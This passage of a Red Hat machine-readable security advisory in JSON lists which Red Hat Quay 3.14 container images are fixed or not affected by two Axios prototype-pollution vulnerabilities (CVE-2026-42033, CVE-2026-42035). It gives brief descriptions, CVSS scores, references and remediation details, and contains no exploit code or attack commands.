            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461607"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461607",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461607"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42033",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"
        }
      ],
      "release_date": "2026-04-24T17:36:44.132000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-42035",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:17.109481+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461606"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application\u0027s core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Arbitrary HTTP header injection via prototype pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461606",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461606"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42035",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"
        }
      ],
      "release_date": "2026-04-24T17:38:07.752000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
